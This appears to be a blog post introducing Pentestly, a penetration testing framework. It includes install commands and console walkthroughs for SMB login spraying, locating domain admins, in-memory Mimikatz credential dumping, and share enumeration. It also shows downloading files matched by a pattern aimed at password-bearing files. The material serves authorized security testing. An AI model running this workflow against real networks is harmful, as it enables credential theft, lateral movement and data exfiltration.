Wednesday, 24 February 2016
0 comments

Pentestly A Python and Powershell Internal Penetration Testing Framework Tool

Pentestly A Python and Powershell Internal Penetration Testing Framework Tool

Pentestly: A Python and Powershell Internal Penetration Testing Framework Tool


Pentestly is a tool for penetration tests. It is a combination of expanding Python tools. The main aim of the Pentestly tool is to utilize the familiar user interface. With the power of Python, the contribution to the framework should be easy. Pentestly utilizes the power of Python, Powershell etc tools together in a familiar user experience.


These are the current tools utilized in Pentestly:

Invoke-Mimikatz.ps1 - By using this tool, we can easily implement Mimikatz in Powershell.
wmiexec.py - These tools enable us to execute Powershell commands quickly and easily via WMI.
recon-ng - For data manipulation recon-ng (Backend database) is beautifully made and leveraged.
smbmap.py - It is used for enumerating SMB shares.
powercat.ps1 - For providing Netcat-esque functionality in Powershell


Features of Pentestly:

>> It is able to import NMAP XML.
>> It can also enable to test SMB authentication using the following:
  •       credentials of an individual.
  •       file containing and null credentials.
  •       By using NTLM hash also.

>> For SMB authentication successful it can test local administrator privileges also.
>> It can also identify readable SMB shares for valid credentials
>> It also provides the feature of Storing Domain/Enterprise Admin account names.
>> It can easily determine a location of running Domain Admin processes and can also determine systems of logged in Domains Admins.
> It also provides a feature of executing Powershell commands in memory and exfil results and Mimikatz to gather plaintext password from memory.


How you can install it:

For installation you need to follow these steps or commands:

git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly


How you can use it:

Step 1-Workspace must be changed-

[pentestly][default] > workspaces list

  +------------+
  | Workspaces |
  +------------+
  | default    |
  +------------+

[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project


Step 2- Load from nmap

[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options

Name              Current Value                  Required    Description
--------          -------------                  --------    -----------
FILENAME  /root/PROJECT/full-all-alive.xml         yes        Path and filename for nmap XML input

[pentestly][project][nmap_xml] > run

Step 3- Test logins

For test logins use file with creds 

[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run

Single username & password must be used

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run

Use credentials over a small subset of IPs 

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'

Step 4- Domain and Enterprise admins must be Gather

[pentestly][project][login] > load get_domain # Notice fuzzy searching - get_domain finds get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options

Name    Current Value  Required  Description
------  -------------  --------  -----------
SOURCE  default        yes       source of input (see 'show info' for details)

[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2


Step 6-Mimikatz should be run over IPs with executable rights

[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
For hosting scripts select the  local interface 

0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1
[*] Execution creds: domain\Admin:[email protected]
[*] Success! Admin.DA:[email protected]$$w0rd  - DOMAIN ADMIN!

Step 7- Show local admins

[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run

+---------------------------------------------------------------------------------------------------------------+
|      host      | access |  username  |  password  | domain | process | logged_in | success | execute | module |
+---------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 |        | nsportsman | password1! | zojix  |         |           | True    | True    | login  |
+---------------------------------------------------------------------------------------------------------------+

Step 8-Show domain admins

[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run

+--------------------------------------------------------------------------------------------------------------------------+
|      host      | access        | username  |  password       | domain | process | logged_in | success | execute | module |
+--------------------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | Domain Admin  | TheRealDA | </l33TPassword> | zojix  |         |           | True    | True    | login  |
+--------------------------------------------------------------------------------------------------------------------------+

Step 9-Enumshares:

[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:[email protected]
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})

Step 10-Show new shares:

[pentestly][default][interesting_files] > show pentestly_shares

+------------------------------------------------------------------------------------------------+
| rowid |       host      |    username   | readwrite |      readonly     | noaccess |   module   |
+-------------------------------------------------------------------------------------------------+
| 1     | 192.168.224.252 | Administrator |           | ADMIN$,C,C$,Users | IPC$     | enumshares |
+-------------------------------------------------------------------------------------------------+

Step 11-Find/Download interesting files

[pentestly][default][interesting_files] > show options

    Name     Current Value                                                                                                                              Required  Description
-------  -------------                                                         ---------  -----------
    PATTERN  (Groups.xml|Services.xml|Printers.xml|Drives.xml|DataSources.xml|ScheduledTasks.xml|unattend|important|passw|backup|setup).*[^dll][^exe]$  yes       Regex pattern to look for in filenames
    SOURCE   default                                                                                                                                    yes       source of input (see 'show info' for details)

Can change the pattern to something a bit more specialized

[pentestly][default][interesting_files] > set pattern important.txt|super_secret
PATTERN => important.txt|super_secret
[pentestly][default][interesting_files] > show options

    Name     Current Value               Required  Description
    -------  -------------               --------  -----------
    PATTERN  important.txt|super_secret  yes       Regex pattern to look for in filenames
    SOURCE   default                     yes       source of input (see 'show info' for details)

Execute and download found files

[pentestly][default][interesting_files] > run
[*] Administrator
[*] Execution creds: workgroup\Administrator:[email protected]
[+] Match found! Downloading: Users\Administrator\Desktop\important.txt.txt
192.168.224.252-Users_Administrator_Desktop_important.txt.txt
[+] Match found! Downloading: Users\Administrator\Desktop\super_secret.txt
192.168.224.252-Users_Administrator_Desktop_super_secret.txt


Contributing:

Creating new modules is easy in Pentestly. Begin with the code provided in skeleton.py:

from libs.pentestlymodule import PentestlyModule

class Module(PentestlyModule):

    meta = {
        'name': 'Your module name goes here',
        'author': 'Developer name goes here',
        'description': 'Description of the module goes here',
        'query': 'SQL QUERY whose result is passed to your module',
        'options': (
            ('Option1', 'Default Value', Required-True/False, 'Description of option'),
        ),
    }

    def module_pre(self):
        # Optional
        # Happens before your module

    def module_run(self, data):
        # Required
        # data is the result from the SQL query set in the options

        ### Few magic functions
        # self.query - Perform an SQL query on the internal database
        results = self.query("select * from pentestly_creds")

        # self.output - print default information to the user
        self.output("Performed an SQL query")
        self.output(results)

        # self.alert - print the successful message to the user
        self.success("Yay! We performed successful work")

    def module_post(self):
        # Optional
        # Happens after your module


TODO:


  • secretsdump.py module should be implemented. 
  • Add utility functions for database queries similar to creds, services
  • To have fixed width columns rework draw_table function 
  • Import credentials from Gladius
  • Implement GPP password search and decrypt module


0 comments:

Post a Comment

 
Toggle Footer
Top